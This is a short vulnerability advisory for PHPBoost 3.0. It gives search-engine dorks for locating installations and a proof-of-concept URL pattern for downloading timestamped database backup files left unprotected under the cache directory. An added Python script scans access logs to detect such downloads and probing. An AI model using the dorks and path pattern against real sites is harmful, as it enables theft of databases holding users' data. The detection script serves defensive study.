PHPBoost is a content management system. PHPBoost has a Remote File Download Vulnerability, which may allow remote download of backup .SQL files.
[+] Info:
~~~~~~~~~
# Title: PHPBoost 3.0 Remote Download Backup Vulnerability
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: Download Backup Database (*.SQL) File
# Tested on: Windows XP sp3 FR
###
# Note: BAC 2011 Enchallah (Me & BadR0 & Dr. Ride & Red1One & XoreR & Fox-Dz... all)
##
# [»] ~ Special thanks to: Dr. Ride
##
# Go0gle Dorks:
#1> "Powered by PHPBoost 3.0"
#2> "Boost é par PHPBoost 3.0"
[+] Poc:
~~~~~~~~~
# Demo:
http://[localhost]/[path]/cache/backup/backup_phpboost_11-03-29-17-35-34.SQL
# Exploit:
http://[localhost]/[path]/cache/backup_[sitename]_*Y*M*D*H*Mn*S*.SQL
% {
Y = year
M = month
D = day
H = hour
Mn = minute
S = second
} %
# Download the backup .SQL file ** access is not forbidden **
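
A defender's check for this exposure, as an added example that is not part of the original advisory: it scans web-server access logs for requests to timestamped backup dumps under cache/, reporting dumps that were actually served and clients that hit repeated 404s on such names. The log lines, IP addresses, function name and the 3-miss threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format); not from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Mar/2011:17:40:01 +0000] "GET /cache/backup/backup_phpboost_11-03-29-17-35-31.sql HTTP/1.1" 404 210 "-" "-"
203.0.113.7 - - [29/Mar/2011:17:40:01 +0000] "GET /cache/backup/backup_phpboost_11-03-29-17-35-32.sql HTTP/1.1" 404 210 "-" "-"
203.0.113.7 - - [29/Mar/2011:17:40:02 +0000] "GET /cache/backup/backup_phpboost_11-03-29-17-35-33.sql HTTP/1.1" 404 210 "-" "-"
203.0.113.7 - - [29/Mar/2011:17:40:02 +0000] "GET /cache/backup/backup_phpboost_11-03-29-17-35-34.SQL HTTP/1.1" 200 482113 "-" "-"
198.51.100.4 - - [29/Mar/2011:17:41:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [29/Mar/2011:17:42:00 +0000] "GET /cache/backup/backup_phpboost_11-03-29-17-35-34.sql HTTP/1.1" 403 199 "-" "-"
"""

# Client IP, request path and status code from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*" (\d{3}) ')
# Timestamped dump name under cache/, per the advisory's pattern (extension matched case-insensitively).
BACKUP_RE = re.compile(r'/cache/(?:backup/)?backup_[^/]*\d{2}(?:-\d{2}){5}\.sql(?:\?|$)', re.I)

def scan(log_text, probe_threshold=3):
    """Return (served, probing): backup dumps served with 2xx, and IPs with repeated 404s."""
    served, misses = [], defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not BACKUP_RE.search(m.group(2)):
            continue
        ip, path, status = m.group(1), m.group(2), int(m.group(3))
        if 200 <= status < 300:
            served.append((ip, path))      # the dump left the server
        elif status == 404:
            misses[ip] += 1                # a backup name that did not exist
    probing = sorted(ip for ip, n in misses.items() if n >= probe_threshold)
    return served, probing

if __name__ == "__main__":
    served, probing = scan(SAMPLE_LOG)
    for ip, path in served:
        print(f"EXPOSED: {path} downloaded by {ip}")
    for ip in probing:
        print(f"PROBING: {ip} is requesting guessed backup names")
```

A 403 on these paths, as in the last sample line, is what a deny rule on the backup directory should produce, and the scan ignores it.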